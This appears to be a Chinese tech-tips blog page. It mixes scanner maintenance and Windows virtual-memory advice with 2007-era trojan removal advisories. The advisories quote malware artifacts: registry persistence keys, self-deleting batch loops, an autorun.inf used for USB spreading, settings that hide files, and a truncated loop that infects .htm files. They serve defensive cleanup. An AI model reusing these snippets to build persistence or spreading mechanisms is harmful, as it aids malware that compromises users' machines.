扫描仪使用经验集锦

扫描仪凭借其低廉的价格以及优良的性能,已经成为人们心目中一种最实用的图象输入设备。但是,不可否认的是,扫描仪使用比较娇气,要想有效地使用它,您还必须学会一些“调教”技巧:

1、不能随意拆卸扫描仪

扫描仪是一种比较精致的设备,它在工作时需要用到内部的光电转换装置,以便把模拟信号转换成数字信号,然后再送到计算机中。这个光电转换设置中的各个光学部件对位置要求是非常高的,如果我们擅自拆卸扫描仪,不小心就会改动这些光学部件的位置,从而影响扫描仪的扫描成像工作。因此大家遇到扫描仪出现故障时,不要擅自拆修,一定要送到厂家或者指定的维修站去;另外在运送扫描仪时,一定要把扫描仪背面的安全锁锁上,以避免改变光学配件的位置,同时要尽量避免对扫描仪的震动或者倾斜。

2、保护好光学成像部件

光学成像部件是扫描仪中的一个重要组成部分,工作时间长了光学部件上落上一丝灰尘也是很正常的,但是如果长时间使用扫描仪而不注意维护的话,那么光学部件上的灰尘将越聚越多,这样会大大降低扫描仪的工作性能的,例如反光镜片、镜头上的灰尘会严重降低图像质量,出现斑点或减弱图像对比度等。另外在使用过程中,手碰到玻璃平板而在平板上留下指纹,也是不可避免的,这些指纹同样也会使反射光线变弱,从而影响图片的扫描质量。因此我们应该定期地对其进行清洁。清洁时,可以先用柔软的细布擦去外壳的灰尘,然后再用清洁剂和水对其认真地进行清洁。接着我们再对玻璃平板进行清洗,由于该面板的干净与否直接关系到图象的扫描质量,因此我们在清洗该面板时,先用玻璃清洁剂来擦拭一遍,接着再用软干布将其擦干擦净。用完以后,一定要用防尘罩把扫描仪遮盖起来,以防止更多的灰尘来侵袭。

3、正确安装扫描仪

扫描仪并不象普通的电脑外设一样那么容易安装,根据其接口的不同,扫描仪的安装方法是不一样的。如果扫描仪的接口是USB类型的,大家就应该先在计算机的“系统属性”对话框中检查一下USB装置是否工作正常,然后再安装扫描仪的驱动程序,之后重新启动计算机,并用USB连线把扫描仪接好,随后计算机就会自动检测到新硬件,大家接着根据屏幕提示来完成其余操作就可以了。如果扫描仪是并口类型的,大家在安装之前必须先进入BIOS设置,在I/O& nbspDevice&nbspconfiguration选项里把并口的模式改为EPP,然后连接好扫描仪,并安装驱动程序就可以了。

4、消除扫描仪的噪音

扫描仪在长期工作后,可能会在工作时出现一些噪音,如果噪音太大,大家应该拆开机器盖子,找一些缝纫机油滴在卫生纸上将镜组两条轨道上的油垢擦净,再将缝纫机油滴在传动齿轮组及皮带两端的轴承上(注意油量适中),最后适当调整皮带的松紧。

5、正确摆放扫描对象

在实际使用图象的过程中,我们有时希望能够倾获得斜效果的图象,我们有很多设计者往往都是通过扫描仪把图象输入到电脑中,然后使用专业的图象软件来进行旋转,以使图象达到旋转效果,殊不知,这种过程是很浪费时间的,根据旋转的角度大小,图象的质量会下降。如果我们事先就知道图象在页面上是如何放置的,那么使用量角器和原稿底边在滚筒和平台上放置原稿成精确的角度,会得到最高质量的图象,而不必在图象处理软件中再作旋转。

6、选择合适的分辨率

很多用户在使用扫描仪时,常常会产生采用多大分辨率扫描的疑问。其实,这还得由用户的实际应用需求决定。由于扫描仪的最高分辨率是由插值运算得到的,用超过扫描仪光学分辨率的精度进行扫描,对输出效果的改善并不明显,而且大量消耗电脑的资源。如果扫描的目的是为了在显示器上观看,扫描分辨率设为100即可;如果为打印而扫描,采用300的分辨率即可,要想将作品通过扫描印刷出版,至少需要用到300dpi以上的分辨率,当然若能使用600dpi则更佳。

7、最好要进行预扫

许多用户在扫描尺寸较大的照片或者文稿时,为了节约扫描时间,总会跳过预扫步骤。其实,在正式扫描前,预扫功能是非常必要的,它是保证扫描效果的第一道关卡。通过预扫有两方面的好处,一是在通过预扫后的图像我们可以直接确定自已所需要招描的区域,以减少扫描后对图像的处理工序;二是可通过观察预扫后的图像,我们大致可以看到图像的色彩、效果等,如不满意可对扫描参数重新进行设定、调整之后再进行扫描。

8、选择合适的扫描类型

选择合适的扫描类型,不仅会有助于提高扫描仪的识别成功率,而且还能生成合适尺寸的文件。通常扫描仪可以为用户提供照片、灰度以及黑白三种扫描类型,大家在扫描之前必须根据扫描对象的不同正确选择合适的扫描类型。“照片”扫描类型适用于扫描彩色照片,它要对红绿蓝三个通道进行多等级的采样和存储,这种方式会生成较大尺寸的文件;“灰度”扫描类型则常用于既有图片又有文字的图文混排稿样,扫描该类型兼顾文字和具有多个灰度等级的图片,文件大小尺寸适中; “黑白”扫描类型常见于白纸黑字的原稿扫描,用这种类型扫描时,扫描仪会按照1个位来表示黑与白两种像素,而且这种方式生成的文件尺寸是最小的。

9、正确扫描文稿

现在不少人为了避免输入汉字的麻烦,开始使用扫描仪来输入文稿;为了保证扫描仪有较高的识别率,大家应该确保扫描的稿件要清晰,在其他条件相同的前提下,对一般印刷稿、打印稿等的识别率可以达到95%以上;而对复印件和报纸等不太清晰的文章进行识别,大部分OCR软件的识别率都不是太高。当用户需要扫描厚度较大的文稿时,若直接扫描,难免会发生内文因无法完全摊开而导致部分文字不清晰及扭曲失真的情况,这样的结果是OCR软件无法正确识别的,大大降低识别率。因此在扫描前,大家最好将文稿拆成一页页的单张,然后再进行扫描。对于一般的报纸,由于本身即是单张形式,因此不存在上述问题,但由于报纸面积通常较大,无法一次扫描,因此预扫时事先框选扫描范围,一次扫描一块区域,这样的辨识效果会大大提高。

10、调整好亮度和对比度

为了能获得较高的图象扫描效果,大家应该学会调整亮度和对比度,例如当灰阶和彩色图像的亮度太亮或太暗时,可通过拖动亮度滑动条上的滑块,改变亮度。如果亮度太高,会使图像看上去发白;亮度太低,则太黑。应该在拖动亮度滑块时,使图像的亮度适中。同样的对于其他参数,我们可以按照同样的调整方法来进行局部修改,直到自己的视觉效果满意为止。

11、巧妙扫描胶片

大家知道用普通扫描仪是不能扫描透明胶片的,必须用具有透扫适配器的扫描仪才能进行,不过具有这个功能的扫描仪价格比较昂贵。那么我们能不能用普通扫描仪来扫描胶片呢?答案当然是肯定的,不过我们需要对普通扫描仪进行改造一下。首先我们要把普通扫描仪内部的光源关闭(这个步骤操作起来难度较大,电子水平不高的话不要轻易尝试),然后在待扫胶片背部添加一光源就可以了。扫描时在扫描仪平台的剩余部分要用黑纸遮住,以防露光。至于新增光源,可用最常见的日光灯。光源的位置不要离扫描仪太近,最好为8厘米左右。

12、校正好扫描色彩

为了能使色彩丰富的彩照获得更高的逼真度,我们在扫描仪之前应该校正好扫描色彩位数。校正时,首先选择好扫描仪标称色彩位数,并扫描一张预定的彩照,同时将显示器的显示模式设置为真彩色,与原稿比较一下,观察色彩是否饱满,有无偏色现象。要注意的是:与原稿完全一致的情况是没有的,显示器有可能产生色偏,以致影响观察,扫描仪的感光系统也会产生一定的色偏。大多数高、中档扫描仪均带有色彩校正软件,但仅有少数低档扫描仪才带有色彩校正软件,请先进行显示器、扫描仪的色彩校准,再进行检测。

13、计算机好输出文件的尺寸

当大家扫描一幅照片时,扫描仪就会在硬盘上生成一个图象文件。此文件所占据硬盘空间的大小是与所扫描照片的大小和复杂程度及您扫描时设置的分辨率直接相关联,因此我们在扫描时应该设置好文件尺寸的大小。通常,扫描仪能够在预览原始稿样时自动计算出文件大小,但了解文件大小的计算方法更有助于你在管理扫描文件和确定扫描分辨率时作出适当的选择。二值图像文件的计算公式是:水平尺寸×垂直尺寸×(扫描分辨率)2/8。彩色图像文件的计算公式是:水平尺寸×垂直尺寸×(扫描分辨率)2×3。

14、善用透明片配件

许多用户发现扫描仪购买回来后,还附带一只透明片配件,这个配件到底是干什么用的呢?不少用户感到很茫然,其实该配件是配合平板扫描仪来扫描透明片用的。为得到透明片或幻灯片的最佳扫描,从架子和幻灯片安装架上取下图片并安装其在玻璃扫描床上,反面朝下(反面通常是毛面)。用黑色的纸张剪出面具,覆盖除稿件被设置的地方之外的整个扫描床。这将在扫描期间减少闪耀和过份暴光。

15、寻找理想扫描位置

通常我们在摆放扫描稿时,都是沿着扫描平板的边缘摆放,其实扫描平板的边缘并不是最佳的扫描区域,那么扫描平板上的什么位置是最佳扫描区域呢?这个最佳扫描摆放位置是经过多次测试和寻找得到的,其具体寻找方法为:首先将扫描仪的所有控制设成自动或默任状态,选中所有区域,接着再以低分辨率扫描一张空白,白色或不透明块的样稿;然后再用专业的图象处理软件Photoshop来打开该样稿,使用该软件中的均值化命令(Equalize菜单项)对样稿进行处理,处理后我们就可以看见在扫描仪上哪儿有裂纹,条纹,黑点。我们可以打印这个文件,剪出最好的区域(也就是最稳定的区域),以帮助我们放置图象。

Leave a comment

木马 System6.jup System6.ins 解决方案

病毒名称:Trojan-PSW.Win32.Delf.zh(Kaspersky)
病毒别名:Generic PWS.y [exe](McAfee), PWS-QQPass.dll [dll](McAfee)
Trojan.PSW.Win32.Agent.vde [exe](瑞星), Trojan.PSW.Win32.Agent.vdd [dll](瑞星)
Win32.PSWTroj.Delf.zh.86577 [exe](毒霸), Win32.PSWTroj.Delf.zf.26424 [dll](毒霸)
病毒大小:22,065 字节
加壳方式:UPX
样本MD5:f8b2ceac4d612c261e371b1403b78eb8
样本SHA1:d9883ce3f755931a48ee7c4048d62c0b600e2a4a
发现时间:2007.9
更新时间:2007.9
关联病毒
传播方式:通过恶意网页传播、其它木马下载技术分析
==========

变种:
【CISRT2006032】盗Q木马 system.jmp system.sys 解决方案
【CISRT2006056】盗Q木马 system.jmp system16.sys 解决方案
【CISRT2006073】盗Q木马 system.jmp system18.sys 解决方案
【CISRT2007020】盗Q木马 system.jmp SystemKb.sys 解决方案
【CISRT2007050】盗Q木马 NewInfo.dll system.2dt 解决方案
【CISRT2007082】木马 NewInfo.bmt system.2dt 解决方案
【CISRT2007091】木马 System16.ins System16.jup 解决方案
【CISRT2007092】盗Q木马 SysWin64.Sys SysWin64.Jmp 解决方案
【CISRT2007123】木马 NewTemp.dll NewTemp.bak PegeFile.pif 解决方案
【CISRT2007131】盗Q木马 SysWin64.Jmp WinSys64.Sys 解决方案

木马运行后将自身复制到:
%ProgramFiles%\Common Files\Microsoft Shared\MSINFO\System6.jup
释放dll注入进程:
%ProgramFiles%\Common Files\Microsoft Shared\MSINFO\System6.ins

创建ShellExecuteHooks启动信息:

CODE:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
“{798977F1-34FC-4DDD-AF6D-1B5C196B4EB4}”=”"[HKEY_CLASSES_ROOT\CLSID\{798977F1-34FC-4DDD-AF6D-1B5C196B4EB4}\InProcServer32]
@=”%ProgramFiles%\Common Files\Microsoft Shared\MSINFO\System6.ins”

添加注册表信息:

CODE:
[HKEY_CURRENT_USER\Software\Tencent\Ie]
“First”

木马会访问网络下载其它病毒、木马或恶意程序到临时目录并运行。

清除步骤
==========

1. 删除木马创建的ShellExecuteHooks项:

CODE:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
“{798977F1-34FC-4DDD-AF6D-1B5C196B4EB4}”[HKEY_CLASSES_ROOT\CLSID\{798977F1-34FC-4DDD-AF6D-1B5C196B4EB4}]

2. 重新启动计算机

3. 删除木马文件:
%ProgramFiles%\Common Files\Microsoft Shared\MSINFO\System6.jup
%ProgramFiles%\Common Files\Microsoft Shared\MSINFO\System6.ins

4. 删除注册表信息:

CODE:
[HKEY_CURRENT_USER\Software\Tencent\Ie]
Leave a comment

安装万能五笔没有添加到输入法列表

我在Windows 2000中安装了万能五笔,但却没有自动添加到输入法列表中,每次使用都必须在开始菜单中启动。怎么才能添加到右下角的输入列表中呢?答:安装完万能五笔后,在输入法图标上点“右键→属性”,弹出输入法设置窗口,选择“添加”,拖动滑动条找到万能五笔后点确定就可以了。这种方法也 不是一定可以解决问题,有的则在列表中找不到万能五笔。所以建议你使用Office 2000自带的五笔输入法,在第一张盘的Msime目录中可以找到。
Leave a comment

系统资源不够,无法完成API

此问题是因为系统中病毒了,可以用pe系统引导进入系统然后进行杀毒.如果觉得麻烦可以直接装系统说简单点,API就是一组外部函数,就像VB内部函数的功能一样,都是完成某种功能的一些可重复使用的代码块,一般使用API是在VB无法完成某种功能时,而又有完成这个功能的API时使用

你先用优化大师或者其它删除垃圾文件的软件把系统的垃圾文件删下,然后把开机运行中没有用的运行选项全部删掉.
应该就可以解决系统资源不足的现象了.
要是还是不行,那就是机子本身的问题了.

虚拟内存的设置方法
在我的电脑 属性 高级 性能设置里面可以设置

虚拟内存
内存在计算机中的作用很大,电脑中所有运行的程序都需要经过内存来执行,如果执行的程序很大或很多,就会导致内存消耗殆尽。为了解决这个问题,Windows中 运用了虚拟内存技术,即拿出一部分硬盘空间来充当内存使用,当内存占用完时,电脑就会自动调用硬盘来充当内存,以缓解内存的紧张。举一个例子来说,如果电 脑只有128MB物理内存的话,当读取一个容量为200MB的文件时,就必须要用到比较大的虚拟内存,文件被内存读取之后就会先储存到虚拟内存,等待内存 把文件全部储存到虚拟内存之后,跟着就会把虚拟内里储存的文件释放到原来的安装目录里了。下面,就让我们一起来看看如何对虚拟内存进行设置吧。
虚拟内存的设置
对于虚拟内存主要设置两点,即内存大小和分页位置,内存大小就是设置虚拟内存最小为多少和最大为多少;而分页位置则是设置虚拟内存应使用那个分区中的硬盘 空间。对于内存大小的设置,如何得到最小值和最大值呢?你可以通过下面的方法获得:选择“开始→程序→附件→系统工具→系统监视器”(如果系统工具中没 有,可以通过“添加/删除程序”中的Windows安 装程序进行安装)打开系统监视器,然后选择“编辑→添加项目”,在“类型”项中选择“内存管理程序”,在右侧的列表选择“交换文件大小”。这样随着你的操 作,会显示出交换文件值的波动情况,你可以把经常要使用到的程序打开,然后对它们进行使用,这时查看一下系统监视器中的表现值,由于用户每次使用电脑时的 情况都不尽相同,因此,最好能够通过较长时间对交换文件进行监视来找出最符合您的交换文件的数值,这样才能保证系统性能稳定以及保持在最佳的状态。
找出最合适的范围值后,在设置虚拟内存时,用鼠标右键点击“我的电脑”,选择“属性”,弹出系统属性窗口,选择“性能”标签,点击下面“虚拟内存”按钮, 弹出虚拟内存设置窗口,点击“用户自己指定虚拟内存设置”单选按钮,“硬盘”选较大剩余空间的分区,然后在“最小值”和“最大值”文本框中输入合适的范围 值。如果您感觉使用系统监视器来获得最大和最小值有些麻烦的话,这里完全可以选择“让Windows管理虚拟内存设置”。
调整分页位置
Windows 9x的虚拟内存分页位置,其实就是保存在C盘根目录下的一个虚拟内存文件(也称为交换文件)Win386.swp,它的存放位置可以是任何一个分区,如果 系统盘C容量有限,我们可以把Win386.swp调到别的分区中,方法是在记事本中打开System.ini(C:\Windows下)文件,在 [386Enh]小节中,将“PagingDrive=C:WindowsWin386.swp”,改为其他分区的路径,如将交换文件放在D:中,则改为“PagingDrive=D:Win386.swp”,如没有上述语句可以直接键入即可。
而对于使用Windows 2000和Windows XP的,可以选择“控制面板→系统→高级→性能”中的“设置→高级→更改”,打开虚拟内存设置窗口,在驱动器[卷标]中默认选择的是系统所在的分区,如果想更改到其他分区中,首先要把原先的分区设置为无分页文件,然后再选择其他分区。
或者,WinXP一般要求物理内存在256M以上。如果你喜欢玩大型3D游戏,而内存(包括显存)又不够大,系统会经常提示说虚拟内存不够,系统会自动调整(虚拟内存设置为系统管理)。
如果你的硬盘空间够大,你也可以自己设置虚拟内存,具体步骤如下:右键单击“我的电脑”→属性→高级→性能 设置→高级→虚拟内存 更改→选择虚拟内存(页面文件)存放的分区→自定义大小→确定最大值和最小值→设置。一般来说,虚拟内存为物理内存的1.5倍,稍大一点也可以,如果你不 想虚拟内存频繁改动,可以将最大值和最小值设置为一样。

44》虚拟内存使用技巧
对于虚拟内存如何设置的问题,微软已经给我们提供了官方的解决办法,对于一般情况下,我们推荐采用如下的设置方法:
(1)在Windows系 统所在分区设置页面文件,文件的大小由你对系统的设置决定。具体设置方法如下:打开”我的电脑”的”属性”设置窗口,切换到”高级”选项卡,在”启动和故 障恢复”窗口的”写入调试信息”栏,如果你采用的是”无”,则将页面文件大小设置为2MB左右,如果采用”核心内存存储”和”完全内存存储”,则将页面文 件值设置得大一些,跟物理内存差不多就可以了。
小提示:对于系统分区是否设置页面文件,这里有一个矛盾:如果设置,则系统有可能会频繁读取这部分页面文件,从而加大系统盘所在磁道的负荷,但如果不设 置,当系统出现蓝屏死机(特别是STOP错误)的时候,无法创建转储文件 (Memory.dmp),从而无法进行程序调试和错误报告了。所以折中的办法是在系统盘设置较小的页面文件,只要够用就行了。
(2)单独建立一个空白分区,在该分区设置虚拟内存,其最小值设置为物理内存的1.5倍,最大值设置为物理内存的3倍,该分区专门用来存储页面文件,不要 再存放其它任何文件。之所以单独划分一个分区用来设置虚拟内存,主要是基于两点考虑:其一,由于该分区上没有其它文件,这样分区不会产生磁盘碎片,这样能 保证页面文件的数据读写不受磁盘碎片的干扰;其二,按照Windows对内存的管理技术,Windows会优先使用不经常访问的分区上的
页面文件,这样也减少了读取系统盘里的页面文件的机会,减轻了系统盘的压力。
(3)其它硬盘分区不设置任何页面文件。当然,如果你有多个硬盘,则可以为每个硬盘都创建一个页面文件。当信息分布在多个页面文件上时,硬盘控制器可以同时在多个硬盘上执行读取和写入操作。这样系统性能将得到提高。
小提示:
允许设置的虚拟内存最小值为2MB,最大值不能超过当前硬盘的剩余空间值,同时也不能超过32位操作系统的内存寻址范围——4GB。

Leave a comment

木马 wnipsvr.exe 解决方案

病毒别名:New Malware.n(McAfee)
Trojan.DL.Win32.List.e(瑞星)
病毒大小:24,323 字节
加壳方式:UPack
样本MD5:e4d3e442916bcbd39fd594c675b565cf
样本SHA1:5879cfc64f33881d13ea26b1a7c540a4088bbf25
发现时间:2007.8
更新时间:2007.8.15
关联病毒
传播方式:通过恶意网页、其它木马下载,可通过移动存储设备传播技术分析
==========

木马下载器,运行后复制自身到系统目录:
%System%\wnipsvr.exe

创建服务:

QUOTE:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\This web]
显示名:1111111
描述:允许对T名称解析的支持。
可执行文件的路径:%System%\wnipsvr.exe

可能将自身复制到分区根目录:
X:\Hide.exe
X:\AutoRun.inf

访问网络下载其它病毒、木马或恶意程序保存到%ProgramFiles%目录下并运行。

清除步骤
==========

1. 删除服务:

CODE:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\This web]

2. 重新启动计算机

3. 删除文件:
%System%\wnipsvr.exe
%System%\perefic.ini
%ProgramFiles%\pro{数字}.exe
%ProgramFiles%\ini.ini

4. 通过资源管理器文件夹树形目录进入分区根目录,删除:
X:\Hide.exe
X:\AutoRun.inf

Leave a comment

木马 avp.exe hvsound2.dll 解决方案

病毒名称:Trojan.Win32.Agent.awz [exe](Kaspersky)
病毒别名:Trojan.Win32.Delf.rsx [exe](瑞星), Trojan.PSW.Win32.OnlineGames.do [dll](瑞星)
Win32.PSWTroj.Maran.jh.239104 [dll](毒霸)
病毒大小:158,208 字节
加壳方式:NSPack
样本MD5:897e8b44dcd47958e27cd89af3334e13
样本SHA1:7ccd7643e8c308a72cd906ddf9810c104842b9ad
发现时间:2007.8
更新时间:2007.8.17
关联病毒
传播方式:恶意网页下载,其它病毒或木马下载技术分析
==========

网游木马,运行后释放文件到系统目录下:
%Windows%\avp.exe
%System%\hvsound2.dll

使用批处理delplme.bat删除自身:

CODE:
@echo off
:loop
del “{原文件}”
if exist “{原文件}” goto loop
del delplme.bat

创建服务:

QUOTE:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VGADown]
显示名:Audio Adapter
可执行文件的路径:%Windows%\avp.exe

修改Winsock供应者:
MSAFD Tcpip [TCP/IP] %System%\hvsound2.dll
MSAFD Tcpip [RAW/IP] %System%\hvsound2.dll

清除步骤
==========

1. 删除木马创建的服务:

CODE:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VGADown]

2. 重命名木马文件:
%System%\hvsound2.dll

3. 重新启动计算机

4. 删除木马文件:
%Windows%\avp.exe
重命名过的%System%\hvsound2.dll

5. 在SREng的“系统修复”->“Winsock供应者”中删除%System%\hvsound2.dll对应的两个项目:
MSAFD Tcpip [TCP/IP]
MSAFD Tcpip [RAW/IP]

注:如果重启后网络不正常(如打不开网页),可以使用WinsockFix等工具进行修复。

Leave a comment

创建服务、通过U盘传播、随机文件名的后门木马 解决方案

病毒名称:Backdoor.Win32.Agent.ahj(Kaspersky)
病毒别名:New Malware.cx [exe](McAfee)
Worm.Win32.Delf.ysg [exe](瑞星), Worm.Win32.Agent.xt [dll](瑞星)
病毒大小:18,278 字节
加壳方式
样本MD5:279b1eef8707872e245e65199c2b21e5
样本SHA1:5c830dd3dcdbf48390d96dd3982498718974002f
发现时间:2007.7
更新时间:2007.7
关联病毒
传播方式:恶意网页下载,其它病毒或木马下载,可通过移动存储设备传播技术分析
==========

木马运行后释放dll注入进程,在系统目录创建副本,生成文件的文件名不固定,由随机字母和数字组成,比如:
%System%\FC00C4C62.EXE
%System%\20533128.DLL

创建服务:

QUOTE:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\{随机字母数字,同显示名}]
显示名:{随机字母数字,同服务名}
描述:{dll文件名}
可执行文件的路径:%System%\FC00C4C6.EXE -k

在各分区根目录下创建副本:
X:\auto.exe
X:\autorun.inf

CODE:
[AutoRun]
open=auto.exe
shellexecute=auto.exe
shell\Auto\command=auto.exe

如果以auto.exe文件名运行,木马会打开自身所在分区的根目录,降低用户警觉。

修改注册表,破坏系统显示所有文件设置:

CODE:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
“CheckedValue”=dword:00000000

修改注册表,破坏系统错误报告方面的设置:

CODE:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT]
“ReportBootOk”=dword:00000001[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PCHealth\ErrorReporting]
“DoReport”=dword:00000000
“ShowUI”=dword:00000000

删除Error Reporting Service服务:

CODE:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ERSvc]

木马不断重复进行以上修改注册表的操作。

尝试访问网络下载其它病毒、木马或恶意程序。

清除步骤
==========

1. 重命名木马主程序文件:
系统目录下的随机文件名exe,如:
%System%\FC00C4C62.EXE

2. 重新启动计算机

3. 删除木马文件:
系统目录下的随机文件名exe和dll,如:
%System%\FC00C4C62.EXE
%System%\20533128.DLL

4. 通过资源管理器文件夹树形目录进入各分区根目录,删除木马文件:
X:\auto.exe
X:\autorun.inf

5. 删除木马服务:

CODE:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\{随机字母数字,同显示名}]

6. 恢复木马修改的注册表信息:

CODE:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
“CheckedValue”=dword:00000001[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PCHealth\ErrorReporting]
“DoReport”=dword:00000001
“ShowUI”=dword:00000001

7. 删除注册表项目:

CODE:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT]
“ReportBootOk”=dword:00000001

8. 恢复Error Reporting Service服务:

CODE:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ERSvc]
Leave a comment

显示器图像会无规律跳动

这时应首先检查一下计算机的外设,可能是因为使用了质量不好的UPS电源,音箱,稳压电源,也可能是主机电源漏磁严重所致或者把手机放在显示器旁边。检查方法:可以分别关闭不同外设来观察显示器屏幕的画面是否有变化。但如果经过检查没有发现其他干扰因素,这可能是显示器内部的电源电路损坏。 这时应首先检查一下计算机的外设,可能是因为使用了质量不好的UPS电源,音箱,稳压电源,也可能是主机电源漏磁严重所致或者把手机放在显示器旁边。

检查方法:可以分别关闭不同外设来观察显示器屏幕的画面是否有变化。但如果经过检查没有发现其他干扰因素,这可能是显示器内部的电源电路损坏。

Leave a comment

什么是内存同步和异步

所谓内存同步,就是内存频率与CPU外频运行在同一频率。也就是说,在内存同步的情况下,内存频率=CPU外频。比如当200MHz外频的P4 520与内存同步时,内存也运行在200MHz外频上。由于使用的是DDR内存,所以内存的频率=200MHz×2=400MHz(DDR400)。内存 异步技术则是让内存频率与CPU外频不同,内存频率=CPU外频×N/M(特定的一个比值)。200MHz外频的P4 520在内存异步时,内存可以运行在166MHz,使用DDR333内存就可以了。当然,内存也可以运行在266MHz,此时系统只需要使用DDR533 内存即可。也就是说,N/M的比值可以大于1也可以小于1,即内存异步时,内存的频率可以高于或低于CPU外频。

Leave a comment

木马 win32.exe qq.exe 解决方案

病毒名称:Trojan-Downloader.Win32.VB.bay(Kaspersky)
病毒别名:Trojan.DL.Win32.Agent.xtk(瑞星)
Packes.MaskPE.a(毒霸)
病毒大小:33,307 字节
加壳方式:PE_Patch.MaskPE
样本MD5:7caea44acee382600bba6f4d403a031e
样本SHA1:683a9758fd7c2afca7d81780ec4ad92407510727
发现时间:2007.8
更新时间:2007.8.13
关联病毒
传播方式:恶意网页下载,其它病毒或木马下载技术分析
==========

木马运行后复制副本到系统目录和IE临时目录:
%System%\win32.exe
%ietemp%\qq.exe

创建启动项:

CODE:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
“qq”=”%System%\win32.exe”

在当前目录生成批处理kill.bat删除自身原文件:

CODE:
:redel
del “{原文件}”
if exist “{原文件}” goto redel
del %0

在IE临时目录生成批处理1.bat:

CODE:
@echo off
for %%a in ({各分区}) do (
if exist %%a:\nul (
for /f “tokens=*” %%b in (‘dir /s/b/a-d %%a:\*.htm’) do (echo ^

访问网络下载其它病毒、木马或恶意程序到%UserProfile%\Local Settings目录下并运行,文件名为Temporary Internet Files加数字。

清除步骤
==========

1. 删除木马创建的启动项:

CODE:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
“qq”=”%System%\win32.exe”

2. 删除木马相关文件:
%System%\win32.exe
%ietemp%\qq.exe
%ietemp%\1.bat
%UserProfile%\Local Settings\Temporary Internet Files{数字}.exe
%Windows%\1.ini

3. 使用工具清除htm*、asp*、php*文件末尾被添加的恶意代码

Leave a comment